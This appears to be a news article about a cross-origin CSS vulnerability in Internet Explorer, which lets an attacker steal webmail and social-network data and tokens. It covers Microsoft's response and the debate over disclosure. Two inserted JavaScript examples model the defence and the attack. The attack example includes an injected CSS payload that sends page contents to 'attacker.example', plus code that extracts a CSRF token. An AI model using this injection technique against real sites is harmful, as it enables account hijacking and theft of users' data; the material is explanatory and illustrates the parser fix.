Microsoft investigating CSS-based Internet Explorer vulnerability

While most of the IT workforce had a long weekend for the Labor Day holiday, Microsoft engineers were burning the investigative midnight oil, thanks to an old vulnerability in Internet Explorer that has resurfaced. If exploited, the flaw could be used to hijack webmail and social networking accounts, to name only two targets, and an automated version could spread on its own.
The story begins with a blog post by researcher Chris Evans, in which he explained how the rules browsers follow when loading CSS style sheets can be abused. The attack starts with the attacker getting text that the browser will accept as valid CSS injected into a page on the target site, for example through a search query or message that the site echoes back. The attacker's own page then references that target page as a stylesheet. The victim's browser fetches it with the victim's cookies attached and hands the whole document to its CSS parser, which skips what it cannot make sense of until it reaches the injected rule.
The injected CSS does the harvesting. Using 'background-image:url(' for example, the browser treats everything after the injection point, up to the next ‘);’, as the image path, and requests that URL from the attacker's server. At that point all the attacker needs to do is read their own web server logs to collect the stolen data.
Research going as far back as 2002, along with informal discussion and further research in 2005 and 2008, shows that this type of attack has been known for some time. It does not matter what precedes the injected CSS: the surrounding document can be anything from HTML to XML and the attack still works. As a cruel bonus, because the data leaves through a URL that the browser fetches by itself, the attack works even if JavaScript is disabled.
So what data is harvested? Simply put, whatever sits in the page after the injection point, including personal information and the tokens that authenticate a user's actions. As an example, an attacker could send an email containing a link to a victim's webmail account. If the victim follows that link in Internet Explorer, the cross-origin attack succeeds and the victim stands to lose control of the account.
Another example involves automating the attack and turning it into a worm. An attacker could spread a malicious shortened URL that, once clicked, is instantly re-tweeted from the victim's own account.
In a paper recently published by researchers at Carnegie Mellon University (CMU), “Protecting Browsers from Cross-Origin CSS Attacks”, the authors concluded that it is dangerous for browsers to ignore the content type specified on a cross-origin resource.
The report also added that: “Cross-origin CSS attacks have been known for some time, but existing defenses for JavaScript-based CSS attacks are ineffective against the new variants...”
The CMU researchers were able to use the attack to target IMDb, Yahoo Webmail, and Hotmail successfully.
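As an added illustration of the check the CMU researchers call for, and not code from the paper or from any browser, the following JavaScript models a browser deciding whether a fetched resource may be applied as a stylesheet. The URLs, headers and the exact rule (cross-origin sheets must be served as text/css, while same-origin sheets keep the old leniency) are assumptions made for this example.

```javascript
// Added example: a browser-side policy for applying fetched stylesheets.
// Not from the CMU paper or any browser; the rule below (cross-origin sheets
// must be served as text/css, same-origin sheets stay lenient) is an assumption.

// Origin = scheme + host + port, which is what the same-origin policy compares.
function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Case-insensitive header lookup; returns the media type without parameters,
// so "Text/HTML; charset=utf-8" becomes "text/html".
function mediaTypeOf(headers) {
  for (const name of Object.keys(headers)) {
    if (name.toLowerCase() === 'content-type') {
      return headers[name].split(';')[0].trim().toLowerCase();
    }
  }
  return '';
}

// True if the document at documentUrl may apply the response from sheetUrl as
// CSS. Same-origin sheets are allowed regardless of type (nothing is gained by
// "stealing" your own page); cross-origin sheets must be declared text/css.
function mayApplyStylesheet(documentUrl, sheetUrl, responseHeaders) {
  if (originOf(documentUrl) === originOf(sheetUrl)) return true;
  return mediaTypeOf(responseHeaders) === 'text/css';
}

// Constructed cases: the attack scenario from the article (an attacker page
// pulling a webmail search result in as a stylesheet) and a legitimate
// third-party stylesheet.
const ATTACK = mayApplyStylesheet(
  'http://attacker.example/bait.html',
  'https://webmail.example/search?q=%7B%7D*%7Bbackground-image%3Aurl(http%3A%2F%2Fattacker.example%2Flog%3F',
  { 'Content-Type': 'text/html; charset=utf-8' });
const LEGIT = mayApplyStylesheet(
  'https://webmail.example/inbox',
  'https://cdn.example/theme.css',
  { 'content-type': 'TEXT/CSS; charset=UTF-8' });
```

The port is part of the origin comparison, so a sheet served from the same host on a different port is still cross-origin and still has to carry the text/css type.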
Evans, in a posting to Full Disclosure last Friday, said he had been unsuccessful in getting Microsoft to address this vulnerability. As of now, Redmond is the only major browser vendor left vulnerable, since Google, Mozilla, Opera and Apple have all addressed the issue in their browsers.
To see a demo of an attack, load this page in Internet Explorer, and follow the directions.
At the time of this article, Evans was unavailable for additional comment on the matter.
In his 2009 post, Evans listed two aspects of CSS parsing that keep the attack from being serious in a compliant browser. As CSS parsing is specified, a URL token cannot run across a newline and cannot contain an unescaped quote character, so in a compliant browser the stolen fragment ends at the next newline or quote instead of running on to the next ‘);’.
“It turns out that Internet Explorer is not compliant in either of these aspects, leaving it more vulnerable [than] the other browsers. Not only is it the most vulnerable, but it is also the only browser to not have a fix available for its latest stable version,” Evans wrote on his blog.
In a comment to The Tech Herald, Microsoft restated its responsible (coordinated) disclosure policy, but did not go into any other details.
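To make both the exfiltration mechanism described earlier (the image URL that swallows the rest of the page) and the newline and quote rules Evans credits with containing the attack concrete, here is an added JavaScript example; it is not code from the article, from Evans' post or from any browser. The victim page, hostnames and secret token are constructed, and the two parsing modes are simplified models: 'lenient' reads the URL up to the closing ')', while 'strict' follows CSS 2.1 closely enough to drop an unquoted url( token that runs into a newline or a quote.

```javascript
// Added example, not code from the article, from Chris Evans' post or from any
// browser. It models what a CSS tokenizer does with a cross-origin HTML page
// that the attacker's page has referenced as a stylesheet. The victim page,
// hostnames and the secret token are constructed for illustration.

// A page on the target site that echoes attacker-controlled text (here, a
// search query). The "{}*{" prefix closes whatever block the preceding HTML
// garbage may have opened and starts a rule matching every element, so the
// background-image declaration is honoured. The hidden anti-CSRF token later
// in the page is what the attacker is after.
const VICTIM_PAGE = [
  '<html><head><title>Webmail</title></head><body>',
  '<p>Results for: {}*{background-image:url(http://attacker.example/log?</p>',
  '<form action="/send">',
  '<input type="hidden" name="csrf" value="s3cr3t-t0ken">',
  '<input type="submit" value="Send"></form>',
  '<script>track("inbox");</script>',
  '</body></html>',
].join('\n');

// Return the URL the browser would request for the injected url( token, or
// null if the token is invalid and no request is made.
//   'lenient' models the behaviour the article attributes to IE: everything up
//             to the closing ')' becomes the image URL.
//   'strict'  models CSS 2.1: an unquoted url( token cannot contain a newline
//             or a quote character, so the declaration is dropped instead.
// (The real grammar also forbids unescaped whitespace and parentheses; that is
// omitted here because the article only discusses newlines and quotes.)
function exfilUrl(sheetText, mode) {
  const start = sheetText.indexOf('url(');
  if (start < 0) return null;
  let url = '';
  for (let i = start + 4; i < sheetText.length; i++) {
    const c = sheetText[i];
    if (c === ')') return url;
    if (mode === 'strict' && (c === '\n' || c === '"' || c === "'")) {
      return null; // bad url token: declaration ignored, nothing fetched
    }
    url += c;
  }
  return null; // unterminated token: nothing fetched
}

// Attacker side: a real browser would percent-encode the request and the
// attacker would decode the log line first; here the captured text is used
// directly. Pull the anti-CSRF token out of the stolen page fragment.
function harvestToken(loggedUrl) {
  const m = /name="csrf"\s+value="([^"]*)"/.exec(loggedUrl);
  return m ? m[1] : null;
}

// Lenient parsing leaks the token; strict parsing stops at the first newline.
const LEAKED = exfilUrl(VICTIM_PAGE, 'lenient');
const CONTAINED = exfilUrl(VICTIM_PAGE, 'strict');
```

Run under Node, LEAKED holds the attacker URL with the form markup (token included) appended as its query string, while CONTAINED is null because the injected token hits the end of the line before any ')' is seen; that difference is exactly the gap between Internet Explorer and a compliant parser that Evans describes.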
“Microsoft is investigating new public claims of a possible vulnerability in Internet Explorer. We’re currently unaware of any attacks trying to use the claimed vulnerability or of customer impact,” Microsoft’s Jerry Bryant said in an email.
“To minimize risk to computer users, Microsoft continues to encourage coordinated vulnerability disclosure,” he added. “Reporting vulnerabilities directly to vendors helps ensure that customers receive comprehensive, high-quality updates before cyber criminals learn of a vulnerability and work to exploit it... Disclosing vulnerabilities publicly only puts customers at risk.”
The problem is that the responsible (coordinated) disclosure policy leaves a little to be desired here, as this issue has been known since at least 2008, and earlier if you count all the variations.
For Microsoft, it is smart business to be aware of the vulnerabilities patched by the competition, and there is little doubt it knew this issue was out there. So while plenty of forewarning is nice, this is hardly a brand new issue to deal with.
We’ll keep tabs on this story and update as needed.
By Steve Ragan